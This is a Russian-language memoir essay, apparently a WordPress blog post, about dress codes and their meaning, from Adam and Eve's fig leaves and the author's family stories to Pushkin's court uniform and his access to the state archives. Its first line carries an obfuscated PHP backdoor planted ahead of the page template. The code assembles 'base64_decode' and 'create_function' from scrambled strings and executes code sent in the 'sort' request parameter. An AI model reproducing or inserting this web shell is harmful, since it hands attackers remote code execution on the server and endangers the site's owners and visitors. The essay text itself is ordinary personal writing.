nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ДРЕСС-КОД И СУДЬБА ЧЕЛОВЕКА


                                                                  эпиграф

"  ИДЕЯ  ПОМЕСТИТЬ  ВЕЛИКОГО  ЦАРЯ  НА  ДИКОМ  УТЁСЕ, НА  КОТОРЫЙ  ОН  ВСКОЧИЛ,
А  НЕ  НА  ОБЫКНОВЕННОМ  ПЬЕДЕСТАЛЕ, КАЖЕТСЯ  НОВОЙ  И  ГРАНДИОЗНОЙ,
НО  ОНА  БЫЛА  ДУРНО  ВОПЛОЩЕНА:  СКАЛА … – ЕЁ  ЛИШИЛИ  ГРУБЫХ  ФОРМ,  ЧТОБЫ
ПРИДАТЬ  ПРАВИЛЬНЫЕ.  …СЕЙЧАС  ЭТО  НЕБОЛЬШОЙ  ПРИГОРОК,  ЗАДАВЛЕННЫЙ
ОГРОМНЫМ   КОНЁМ, …И  ЦАРЬ…ЕДВА   МОЖЕТ  СОЗЕРЦАТЬ  ПЕРВЫЙ  ЭТАЖ  СОСЕДНИХ   ДОМОВ. ( ! ! ??)
ПО  СТРАННОМУ  ПРОТИВОРЕЧИЮ,  ПЕТРА  I   ОДЕЛИ   В   Т О    С А М О Е   Р У С С К О Е    П Л А Т Ь Е,
О Т   К О Т О Р О Г О   О Н    С И Л О Й   О Т У Ч А Л    С В О И Х    П О Д Д А Н Н Ы Х (…) "
     ( Шарль  М а с с о н :  "Секретные  записки  о  России  времени  царствования  Екатерины II  и ПавлаI,
                    наблюдение  француза, жившего  при  дворе,  о  придворных  нравах, демонстрирующее
                    незаурядную  наблюдательность  и  осведомлённость  автора " )

         Ничего  себе : РУССКОЕ   ПЛАТЬЕ  на  фальконевском  Петре I  !
         А  ведь  этот   Ш а р л ь   Массон  описывал   Петра  Первого,  " Медного  всадника "  –  с  натуры.
        Он,   д и п л о м а т  –   да  это  же  он  описывает  не  в  частном  письме,  а   в   с е к  р е т н ы х    з а п и с к а х !  Да  не  для  широкого  круга читателей;  да  с  такой  фамилией,  колышащей  основы мироздания !
        И  смех  и  грех !  Ведь  и  сам, конечно,  верил  в  то,  что  писал …  шарль – шарли . . .

                                                                                              Г Р Е Х

       Со  времени    г  р е х о п а д е н и я    проблема  о д е ж д ы    встала  ребром.
       Что  бы  там  не  говорили:  о п о я с а л и с ь   ли   Адам  и  Ева  листьями  фигового  дерева  или  с ш и л и  эти  листья  –  приобретя   в  момент  изгнания  из  рая  " дар "  р е ф л е к с и и   ( видения  себя  со  стороны,  как  бы  чужыми  глазами ) они,  однозначно  рефлексируя, сами   у п о д о б и л и с ь    д е р е в ь я м    наподобие  дерева,  от  которого  только  что  вкусили  и  вслед  за  этим  сорвали  с  него  ф и г о в ы е   листья – для  якобы  прикрытия  "причинных  мест". Как  говорится, каждый  всё  понимает  в  меру  своей  испорченности !
(Извините за  шутку: Адам  с  Евой  рефлектировали  не  на  Бога  и  Его  инструкции,  как  должно  было  быть,  а  на ФИГ  знает  что !)
     Недаром  евангельский  слепой,  исцелённый  Христом,  прозревая, на  вопрос  Христа  " видит  ли  что ? "  ответил:
                                         " Вижу  проходящих  людей,  как  деревья " (Мк,8-24)
      Это  " кино "  жизни прозревающий  начал  созерцать с  самого  н а ч а л а:  с  эдемского  пейзажа  с  деревьями, но  который  последним  увидели,  оглянувшись,  прародители,  покидая  рай.
    И  если  раньше  слепой  познавал  мир  " только  наощупь ",  то,  облагодетельствованный  Христом,  он  словно  вышел  из  гроба  своего  тёмного  внутреннего  мироощущения,  он   в ы ш е л   и з   с е б я.

                                                                             И    Г Р Е Х     И    С М Е Х

                 Вы  не  поверите,  что  я  выудила  в  Интернете  про  знаменитого  карикатуриста  Жана  Эффеля,  который  отнёсся  к теме  "С О Т В О Р Е Н И Я    М И Р А"  (там,  оказывается, 5 тысяч  рисунков,  которые  мы  называем  " карикатурами ")  с той  же  ответственностью,  с  какой  учащиеся первого класса  духовной  семинарии  пишут  сочинение  на  ту  же  тему.  Но в отличие  от  бурсаков  Эффель   добился разрешения  на  пребывание   в   больнице   в. . . операционной . . .  впрочем, процитирую:

       ". . .  К  своей  работе  он  относился  необычайно   добросовестно,  стремился  к  достоверности  в  деталях,  касающихся сведений  по  геологии,  ботанике,  географии, зоологии,  анатомии. В  соответствии  с  общим  духом  книги,  проникнутой наивным  взглядом  ребёнка,  открывающего  для  себя  мир,  эти  знания  он  черпал  из  школьных учебников,  бывших  во время  этой  работы его  настольными  книгами.
     А  для  того,  чтобы  реалистически  изобразить  создание  Евы,  он   т р и    р а з а    побывал   на  операции    к о с т о т о м и и   (удаления РЕБРА !).  Т р и   раза  –  потому  что дважды   падал  в  обморок.  И  только    т р е т и й   раз  выдержал  до
конца.  В  его   рисунках   –  у р о в е н ь    медицины  ( правда )  тридцатилетней   давности  . . .  "

   Я   со  "  своей  колокольни "  могу  на   этот     педантизм   и   б у к в а л и з м     ответить  равнозначным  примером  из  жизни.
   Когда  погибли  подводники,  находившиеся  на  субмарине  " Курск ",  одна  наша  с  мужем  знакомая,  которая смеломожет  именовать  себя  " духовной  чадой "  моего  мужа,  довела  меня  до  потери  нормативной  лексики. Она,  быв некогда школьной  учительницей,  но  ушедшая   из  школы  в   работницы  церкви,  а  потом  –  в  иконописицы,  мне    в
телефонную трубку  безутешно больше  часа  рыдала: "  Ну  как  же  их  души  преодолеют  толщу  воды  и  вознесутся  ко  Господу ?!  Нет, их  души  не  смогут  преодолеть   стодесятиметрового   давления   воды . . .! "
      Никакие  мои  утешения  не   смогли   преодолеть  толщу   " высшего  образования "   духовной   " чады "   вкупе,  как сказано  выше  про  Эффеля,  с " наивным  взглядом  ребёнка,  открывающего  для  себя мир ".

                                                             И    С М Е Х     И     С Л Ё З Ы   (  про  одежду )

    Само  слово  " о д е ж д а "    есть  полноправный  синоним  слова  " н а д е ж д а "  –  так  же,  как   и  в  вечном пресловутом   споре,  где  что  правильнее говорить:  " о д е в а т ь "  или  " н а д е в а т ь " ?

       Наш  младший  сын,  учась  в  музыкальном  колледже  на   одном  из  экзаменов по  " специальности " за  свой   внешний  вид  был  " репрессирован "  понижением  оценки  с  пятёрки   на  четвёрку.
    Возглавлявшая  экзаменационную  комиссию  мэтр  старейшего  музыкального  колледжа,некогда   у ч и л и щ а  (при консерватории),  Л-ь  (которая  пыталась  в  своё  время  " усмирить "  Анну  Нетребко)  потребовала  на  экзамене  по  вокалу, как  я  сказала, чтобы  комиссия  снизила  оценку  на  балл, поскольку  все  учащиеся  были "нормально ", " демократично" одеты, а   н а ш   явился … в   с м о к и н г е !
    Кстати,  я  была  на  этом  экзамене  (  творческие  экзамены  –  открытые ).
    Я,  извините,  похвастаю,   о б р ы д а л а с ь  . . . Конечно,  не   из – за   четвёрки,  а  от  сюрприза,  мне  сыном   приподнесённого.  Он  среди  двух  других  произведений   спел  выученную  некогда  со  мной,  но  з а н о в о   выученную  с   педагогом – " Сирень "  Рахманинова ! ( см.  одну  из  моих  предыдущих  меморий).  Это  было  редкое  чувство  счастья . . .

          Но  со  старшим  были    т о л ь к о    слёзы.
          По  окончании   университета,  на  церемонии  выдачи  дипломов  старшенький  учудил.
          Едва  получив  в  руки  диплом,  он  рванул  из  здания,   и  друзья,  подозревая  недоброе –  за  ним. Выскочив  " на   в о л ю ",  то  есть  на  одноименную  этому  заведению  Университетскую  набережную,  старшенький  швырнул  диплом  в правый  куст  сирени,  сняв  одежду  –  ай,  ну  её  в   левый  куст  сирени  (надеясь,  что  ребята  подберут),  вскочил  на парапет  набережной  и  сиганул  (он  занимался  в  детстве  в  Олимпийском  бассейне)  в   матушку-Неву.
   Дойдя  до  той  глубины,  где  уже  надо  было делать  кувырок  на  выныривание,  он  рефлекторно  оттолкнулся  от  массы воды, насквозь  проткнув,  словно  стигмы, обе  ступни,  напоровшись  на  острия,  вероятно,  брошенной  в  давние  времена  в  Неву  решётки . . .  Бог  в  очередной  раз   с п а с   . . .

                                                                        И    Л Ю Б О В Ь   ( к   б л и ж н е м у )

      Как  я  говорила, в  армии  о.Георгий  был  танкистом.  А  если  кто  не  знает,  то  до  1968 года  срок  службы  в  советской  армии  тянулся  три  года.
      Мой  муж  был  великан.  Я  гордилась  его  необыкновенностью,  как   Александр  Сергеевич  Пушкин  гордился  красотой  своей  Натали.
     Поэтому  можно  только  удивляться, как  его  с  его  комплекцией   сделали   " механиком – водителем  среднего  танка "?
    "Энергия  заблуждения",  то  есть  идиотизм  –  вообще   принцип   з е м н о й    жизни,  а  не  социально – политическое явление;  её, " э н е р г и ю   идиотизма ",  как  и  атомную,  давно   пора   поставить  " на  службу  мира " !
Но  если   а т о м н у ю    энергию сначала
                                                  1) о т к р ы л и ,  а  потом   2)  и з у ч а л и,  потом   3)  стали  п о л ь з о в а т ь с я,
то  " энергию  заблуждения ",  наоборот:   ею  только  и  (1)  пользуются ,  2) её  волей-неволе начинают   а н а л и з и р о в а т ь,  дойдя  сейчас до  грани  мирового  саморазрушения,   и  3)  её,  пока  не  поздно,  пора  " з а к р ы т ь ".

           Так   вот.  Природа  Богом  так  устроена,  что  всё  промыслительно   балансируется  как  бы  само  собой. Если  мой  " широкоформатный"  Георгий   был  по  списку,  чисто   ф о р м а л ь н о   в  механики-водители   зачислен,  то  ему  в  танк  для уравновешивания  силы  послали  тщедушное  существо  дистрофичного  вида  и  с удивительной  фамилией  Б ы л и н а.
       Тут, конечно,  можно  усмотреть  замечательную особенность  русских  слов  " работать  на  два  фронта ",  на  несколько  с м ы с л о в    сразу:  тут   и  трава – былинка  в   поле,  и  материал  для  народного  э п о с а !
        А  надо  сказать,  что  дело  защиты  неприкосновенности  наших  границ  легендарным  Киркенесским  полком   происходило  на  границе  с  Норвегией,  где   климат   ой-ёй-ёй !  Холод  не  тётка !  Каждая  калория  и  градус  на  счету !
       Георгий  проникся  к  Былине  шефскими  чувствами.  Он, как  мне  сам  рассказывал,  выковыривал  беспомощного танкиста  из   этого  самого  танка  и  на  руках  носил  в  столовую,  отдавая  там  ему  свои  порции. Былина  же  не прибавлял ни в  теле,  ни  в   жизнестойкости. И  вот  мой  будущий  муж  решился  "на   поступок ".  Когда  в  части выдали  сапоги  к весне на  смену  валенкам, он  свои  сапоги  обменял  на  " душегрейку "…  но  не  в  смысле  одежды,  а  на  то, что  душу   и з н у т р и   греет,  на спиртное, которого  у  нас  везде  что  нефти  с  газом.
        Однако  с  Былиной  результат  был противоположный ожидаемому:  сначала  его,  как  травинку,  ветром  носило  по  коридору, и   даже ловкий  капитан Белоречев  не  мог  его поймать. А  потом  Былина   в   подножии   капитана  мирно   у в я л.  Тем   дело  воскрешения  и  кончилось.
       Но,  как говорится,  добрые  дела  наказуемы.
       Пришло  и  на  Север  9  мая,  весна.  Всех  выстроили, как  положено,  на  торжественное  награждение  медалями  " 20 лет  победы  в   Великой  Отечественной  войне ".  Мало  того,  что  мой  будущий   муж   выделялся  в   строю  своей комплекцией,  так  и  его  громадные  валенки  в  ряду  с  начищенными  сапогами  несли  угрозу  не  только  " потенциальному  противнику ",  но  и  ему  самому.  В  общем  за  нарушение  "  дресс- кода "  остался   наш  сердобольный   механик – водитель,  будущий  отец  Георгий,  без   медали . . .   . . .  Да  что ж   за  напасть  такая: опять  стих  получился:
                                                                         Н Е   Д А Л И
                                                                         М Е Д А Л И !

                        Г О Л А Я     П Р А В Д А     И       Е Ё      И Д Е О М А Т И Ч Е С К И Е      В Ы Р А Ж Е Н И Я
        Но  вернёмся  к  заявленному  эпиграфу,  поскольку  у  меня  есть  цель  не  просто  вещать  здесь  " байки  из  склепа ",  а     д о н е с т и      м ы с л ь …  –  это  тоже  ведь  идиоматическое  выражение,  как  и    "в  голову    п р и ш л а    мысль ",  ибо   у  мысли  нет  ножек,  а  на  ручках  "  мысль "  тоже  невозможно  носить  !  Тем  не  менее . . .
   Так  вот,  тем = тематических  проблем   не  менее = не  меньше,  чем  самих  слов.
   Говорится:  первое  слово  дороже  второго.  То  есть  если  кто- то  первый  что-то  авторитетно  ляпнет,  до  последующие, смакуя   прелесть   новизны  сказанного,  разум  так  и   н е   включают,  поскольку  это  энерго ,  а  бывает,  и  материально  затратней. Вспомним  уже  несколько  раз  цитированного  мной Боденштедта !
      Итак,  возвращусь  к  сотворению  мира  ( внутреннего  мира ) Адама  и  Евы,  а  закончу  национальной  идеей. И  весь  этот  путь  выстлан  проблемой  не  только  " что  поесть ?",  но  равноправной – "  что  надеть ? ". Недаром  в  древней  традиции  было бросать  под  ноги  триумфатору  не  цветы  и  " ветвия ",  но  и  свои  о д е ж д ы.
           В  Ветхом  завете  (  в  переводах ) сказано,  что  Адам  и  Ева    " опоясались "  фиговыми  листами,  и  что  они  их  " с ш и л и ",  и  что  от  Бога   спрятались  в   д е р е в ь я х. Но  спрятаться  можно  " в   к у с т а х " ! Как  можно  с п р я т а т ь с я  " среди  деревьев " ?  Подразумевается, несомненно  –  как слово,  так  и  действие  –  з а м а с к и р о в а л и с ь,  что  мы  и  видим  на  современном  в о е н н о м   обмундировании, то  есть  наляпанные  на  тонкую  основу   л и с т ь я.
      Вот  эту   маскировку и  можно  назвать  " костюмом  Адама " ! Повторяю  кто  не  понял: Адам  и  Ева  сшили  сами  себе  накидки  из  листьев,  не  чтобы  прикрыть  " причинные " места,  функция  которых  стала  ясна  гораздо  позже – с  естественным  зачатием  К а и н а, а  для  того,  чтобы  среди  деревьев  простодушно  з а м а с к и р о в а т ь с я   от  Бога ! Фрейд  тут  ни  при  делах !
       Вот  и  получилось, как  им  казалось, что  они   с п р я т а л и с ь   между   д е р е  в ь е в,  словно  в  сказке  про  Винни-Пуха,  где  медведь – экзистенциалист,  прячась  от  грозных  пчёл, " прикидывается "   т у ч к о й :
                                                                         Я  тучка -тучка-тучка,  а  вовсе  не  медведь !
                                                                         Ах,  как  приятно  тучке  по  небу  лететь !
       Как  пошла  дальше  индустрия  моды  после  грехопадения –  это  давно  изученная  тема.  Скажу  только  ещё  одно  своё  наблюдение  по  Библии.

          Однажды,  когда  меня, слава  Богу,  не  было  в  Теребенях,  мой  муж  принял  группу   строгих паломниц.  Могу  предположить:  они  были  в  длинных  мешкообразных  юбках, в  своих  любимых традиционных  а-ля-мужских  пиджачках,  под  которыми  а-ля-пионерские  блузки,  под  которыми  у  многих  вместо  "комбинэ"  футболки, что  от  " мужского " слова   ф у т б о л.
     Приехав,  я  обнаружила  на  подоконнике  брошенные  прокламации,  которые  они  не  лично  мне  в  укор  положили,  а просто  самоотверженно  неся  миру  свет  просветительства ( пардон  за  масло  масляное ,  хотя  слово  " свет " –  э л е о (масло), электричество  –  и  произошло  от  масляных  светильников ). В  прокламации  была  цитата  с  проклятием  тем женщинам, которые  носят  мужскую  одежду,  которую  они  понимают  исключительно  в  виде  брюк. Причём, когда  я временами влезаю  в  эту  тему,  то   говорю: " А  ваш  пиджак  –  это  что,  не  "мужское  разве  одеяние "? "  – а  они  мне показывают фасонные  вытачки,  а  также  по-женски  справа  налево  застёгивание.  А  когда  я  смею  возражать,  что  и  у брюк фасонные  вытачки  и  ширинки  по-женски  запахнутые  –  они: " Это  не  считается  –  ведь  брюки  же !"  Логика  чисто женская !
        И  вот  в  оставленной  прокламации  были  указаны  глава  и  стих  по  Библии,  куда  надо  справляться   за доказательством,  что  я сразу не  преминула  сделать ( Второзак., 22, 5):
 
          " На  женщине  не  должно  быть  мужской  одежды, и
            МУЖЧИНА  НЕ  ДОЛЖЕН  ОДЕВАТЬСЯ  В  ЖЕНСКОЕ  платье,
            ибо  мерзок  пред  Господом…"

       НО !  Давайте  читать  и  исполнять   в с ё   написанное,  например, далее  абсолютно  неисполнимое: " НЕ  НАДЕВАЙ  ОДЕЖДЫ, СДЕЛАННОЙ  ИЗ   Р А З Н Ы Х    В Е Щ Е С Т В, ИЗ  ШЕРСТИ   И   ЛЬНА   ВМЕСТЕ " ( ! ! !)
                                                     Синтетика  !  Как    же  её  " д о л о й !  проклято ! "  ?
      Или  там  же (…11, 12): "Сделай  себе  к и с т о ч к и " на  четырёх  углах  покрывала  твоего, которым  ты  покрываешься " !     Тётки  церковные,  где  ваши   к и с т о ч к и ,  прописанные  там  же  в  Библии  на  платках  (бахрома  не  считается,  сказано  же  – кисточки ") ?
      Что ж,  получается  "  наше  вам  с  кисточкой " ?

              И  вот  плавное  возвращение  к  моей  предыдущей  теме  портрета  Наталии  Николаевны  Пушкиной   в  костюме,  вдохновлённом  модной   в  то  время   картиной  иудейки  Ребекки.
             А   ш а р о в а р ы,  в  которых  она  посмела  явиться, хоть  и  на  маскарад,  но  в  изысканнейшее  придворное  общество  избранных  –  это  всё-таки  женщина  в  "брюках" !  Несомненно,  в  некоторой  степени  это  был  дизайнерский   п р о р ы в ,  эпатаж,  даже,  возможно,  женская  месть  за  латентный  конфликт  с  царём  ( фрак  или  мундир ?- в  похоронах  супруга).
               Я  много  лет  (с 1998г.)  между  друзьями  и  знакомыми  устно " обкатываю"  тему  " нащокинского  фрака  и  камер-юнкерского  мундира  Пушкина:  почему  никто  никогда  не  задумался  о  прямом  нарушении  субординации  и  соответствующей  репрессивной  реакции  царя ?  Пушкин  однозначно  д о л ж е н   был  быть  похоронен  в  мундире !
         Да  и  по  себе  я наблюдаю,  насколько  все  ныне  " разболтались "  в  смысле  строгости  о д е я н и й   куда  угодно:  в театр, школу, приём, в  ресторан,  в  гости,  на  те  же   п о х о р о н ы . . .  Все  "хором"  забыли,  как  в  школу  не  пускали  в капроновых  чулках,  без  галстука  или  значка,  или  нужного  цвета  фартука  или  ленточки  в  косе,  не  говоря  уже  о  " взрослой "  жизни,  где  почти  всё  по  инерции  с  дореволюционных  и   " довоенных "  времён,  было   р е г л а м е н т и р о в а н о  и   опасно  при  нарушении  общепринятых   правил  – recepta  sententia.
         Пример  из  личной  жизни ( и  смерти ).
         Мой  муж-священник  так  быстро  умер  и  так  всё  милостью  Божией  сложилось,  что  вокруг  меня были  компетентные  в  похоронах  люди,  прежде  всего  священники.
       Наш друг,  иеромонах,  гостивший  у  нас, как  только  я  ему  сказала  о  происшедшем,  сразу  мне  повелел: " Валя,  звони  в  епархию  – так  положено "! Мне  бы  этого и  в  голову  бы  от  стресса  не  пришло, а  если  бы  и  пришло,  в  последнюю  очередь,  поскольку  четверть  века  мы  в  Теребенях  прожили  некими  " маргиналами ";  я  никогда  не  сталкивалась  и  не  задумывлась,  как  х о р о н я т    простых  священников.  А  на  самом  деле,  это  утончённая  процедура,  и  занимаются  которой  исключительно  сами  священники, никого  не  подпуская, обтирая  покойного   м а с л о м   и  облачая  в  священнические  одежды.
    Вывод.  Если  б  обстоятельства  сложились  менее  милостивно  ко  мне,  и  я  бы   по – граждански ,  в  " штатское ",  с  помощью  таких  же,  как  я,  " лохов ",    о д е л а   бы  мужа,  положила  и  т.п. –  то  это  было   бы   вопиющим  нарушением   ц е р к о в н о й    субординации   и  выглядело  бы  нонсенсом,  даже   в ы з о в о м,  и   привело  бы  к  излишним  разборкам  и нервотрёпке. Хотя  " п р о с т ы м    с м е р т н ы м "  была  бы  непонятна  суть  очередного  церковного  конфликта . . .
         То  же  самое  и  в  " светской "  ,  тем  более  –  п р и д в о р н о й   –  жизни,  когда    каждое   л ы к о     в    с т р о к у.
          Возвращаясь  к  Пушкину:  расхожее  мнение, которое  внушил  всем  сам  Пушкин: что   камер – юнкерский   чин (соответствующий  военному  чину  " капитан" ) дан  ему  только  ради  блистания   н а   б а л а х    Натали  –  но   это  элегантное   прикрытие  серьёзной    г о с у д а р с т в е н н о й    и д е и .
     Пушкин  был  в   з в а н и и   титулярного  советника  IX класса. ( а  некогда  изучаемый  мной  Башмачкин  был  титулярный  советник  X класса !). Чтобы  получить  звание  камергера,  надо  было  иметь уровень  III – V классов. Поэтому  исторические  свидетельства, что  мол  Пушкину  предлагали  камергерство – это  была словесная  " проверка  на  вшивость"  Пушкина,  а  не  реальное  предложение,  так  как перескочить  через " классы "  было  нельзя. А  низший, камер – юнкерский,   ч и н    у ж е  давал   законный   д о с т у п   к   секретным  документам.
      Есть  ещё  превратное  утвержденеие,  что  Пушкин   с а м   придумал  заниматься  историей  Петра I. Я  не  понимаю,  зачем  профессиональным  историкам  и  педагогам надо  в р а т ь ?
     Это  был   г о с з а к а з,  причём   авансами  Пушкину  хорошо   л и ч н о   ц а р ё м  оплачиваемый !
     Перепечатываю  из  Вересаева:
                                                             В.Д.КОМОВСКИЙ  16  ОКТЯБРЯ  1831  г. ПИШЕТ,  ЧТО:

   ГОСУДАРЬ  ВЕЛЕЛ  пУШКИНУ  НАПИСАТЬ  ИСТОРИЮ  ПЕТРА  ВЕЛИКОГОР  И  РАССКАЗЫВАЕТ  ПО  ЭТОМУ               ПОВОДУ  ДАЖЕ,  КАК  ЭТО  СЛУЧИЛОСЬ.  ПУШКИН  ВСТРЕТИЛСЯ  С  ГОСУДАРЕМ  В  ЦАРСКОСЕЛЬСКОМ  САДУ  И  НА ПРЕДЛОЖЕННЫЙ   ВОПРОС  : "  ПОЧЕМУ   ОН  НЕ  СЛУЖИТ ? "  ОТВЕЧАЛ: "  Я   ГОТОВ,  НО  КРОМЕ   ЛИТЕРАТУРНОЙ СЛУЖБЫ,  НЕ  ЗНАЮ  НИКАКОЙ ".
  ТОГДА  ГОСУДАРЬ  ПРИКАЗАЛ  ЕМУ  СОСЛУЖИТЬ  СЛУЖБУ  –    Н А П И С А Т Ь    И С Т О Р И Ю   ПЕТРА  ВЕЛИКОГО. "

                                                                                     Д.Н. Садовников, Отзывы  о  Пушкине.  Ист. Вестн,, 1883, № 12, 553.

                                                           П У Ш К И Н   –   П Л Е Т Н Ё В У,  22 июля  1831тг.  из  Царского  села.

      …КСТАТИ  СКАЖУ  ТЕБЕ  НОВОСТЬ,   НО  ДА  О С Т А Н Е Т С Я    Э Т О ,  П О    М Н О Г И М   П Р И Ч И Н А М,   М Е Ж Д У   Н А М И ): ЦАРЬ  ВЗЯЛ  МЕНЯ НА  СЛУЖБУ,  НО  НЕ  В  В КАНЦЕЛЯРСКУЮ,  ИЛИ  ПРИДВОРНУЮ,  ИЛИ  ВОЕННУЮ  –  НЕТ,  ОН  ДАЛ  МНЕ ЖАЛОВАНИЕ,   О Т К Р Ы Л    М Н Е   А Р Х И В Ы,  С  ТЕМ,  ЧТОБЫ  Я    РЫЛСЯ  ТАМ  И   НИЧЕГО  НЕ  ДЕЛАЛ.  ЭТО  ОЧЕНЬ  МИЛО  С  ЕГО  СТОРОНЫ,  НЕ  ПРАВДА  ЛИ ? … ЕЙ-БОГУ,  ОН  ОЧЕНЬ  СО  МНОЮ  МИЛ.

     А  30  июня  1834 г.  Бенкендоф  Пушкину  на  его  просьбу  снять  камер-юнкерский  чин,  извещает  его  о  согласии  царя, н о:

          …ЗАТЕМ  НА  ПРОСЬБУ  ВАШУ  О  ПРЕДОСТАВЛЕНИИ  ВАМ  И   В    О Т С Т А В К Е    П Р А В А   ПОСЕЩАТЬ  ГОСУДАРСТВЕННЫЕ  А Р Х И В Ы   ДЛЯ  ИЗВЛЕЧЕНИЯ  СПРАВОК   ГОСУДАРЬ  ИМЕРАТОР   Н Е   ИЗЪЯВИЛ  СВОЕГО  СОИЗВОЛЕНИЯ,  ТАК  КАК  П Р А В О  СИЕ  МОЖЕТ  ПРИНАДЛЕЖАТЬ  ЕДИНСТВЕННО  ЛЮДЯМ,  ПОЛЬЗУЮЩИМСЯ  ОСОБЕННО   ДОВЕРЕНОСТЬЮ  НАЧАЛЬСТВА.

    Это  тоже  есть   с у б о р д и н а ц и я.
    В  тайных  же  архивах, к  которым  был  допущен  Пушкин,  хранился  ( значит, вероятно,  и  до  сих  пор хранится )    в е с ь архив  В о л ь т е р а,  полностью  скупленный   Екатериной  II   и  в  сохранности  доставленный  в  Петербург. Екатерина  не  поскупилась  на   эту    к у ч у   неразобранных    б у м а г    ради  собранных  Вольтером  по  всей  Европе   материалов   для  романа,  который  он,   В о л ь т е р,  собирался  писать  о  Петре I.
     Как известно,  " госзакас "  Пушкиным   на  написание  им, Пушкиным,  истории  Петра  выполнен  не  был.
    Н е    б ы л     э т о т,  уроненный  Пушкиным, флаг  национальной  задумки  рано  умершего  Петра  поднят  и  Львом  Николаевичем  Т о л с т ы м.  Только  однофамилец  последнего  А.Н. Т о л с т о й    получил  за  свой  роман  " Пётр  Первый "  Сталинскую  Премию.

      Эта  тема  непосредственно  касается  истории  Теребенской  церкви,  которая  сейчас  переживает  драматичнейший  период. Во-первых,  Илларион  Матвеевич  Голенищев – Кутузов  – по  историческому ( вероятно,  масонскому ) прозвищу  РАЗУМНАЯ  КНИГА –  з а ш и ф р о в а л   в   семантическом  устройстве  храма  некую  тайну.  Но  это  "  устройство "  сейчас на  неопределённое  время  в  связи  с  капитальным  ремонтом  и  смертью  настоятеля  ( моего  мужа )  полностью перевезено  во  Дворец – музей  Гатчина.  Поэтому  я  и  возмещаю   это, надеюсь,  временно   п у с т о е    сакральное   п р о с т р а н с т в о    своей   беллетристикой.
          Искренне  благодарю  за  внимание . . .

     Ой,  а  г л а в н о е    я    чуть   не  забыла  сказать  –  что-то  меня  отвлекло . . .  Как   это   в   г л а в н о м   и   бывает.

       В  Варваринском-то  приделе ( прижизненном  отца  /1717? – 1784/ полководца  Кутузова )  в  алтарной  преграде,  как Христу  и  полагается  быть  с  южной  стороны  от  Царских  врат, Христос не  в  статичной  позе, а  делающий  к  зрителю как  бы  шаг  навстречу . И    в о т   что   г л а в н о е :  портретно  в  облике  Христа запечатлён  Пётр  Первый !

       Конечно,  дело  экспертов – физиогномистов  установить, так   ли  это  –  как  это  было  выяснено  и  официально  утверждено  в  случае  с  портретом  Наталии  Николаевны  Пушкиной  кисти  Гау  в  Русском  музее  в  период празднования  двухсотлетия  поэта  (о  чём  у  меня  рассказано  в  одной  из  предыдущих  меморий).
      Так  за  чем  дело  стало ?  Вот  я  и  привлекаю  внимание.
       Ещё  раз  за  него  признательна.

                      +
               петр  иоанн  андрей
филипп  фома  варфоломей
              два  иакова  матфей
  иуда яковль,т.е. ф а д д е й
    зилота симон   и  матфИй


Добавить комментарий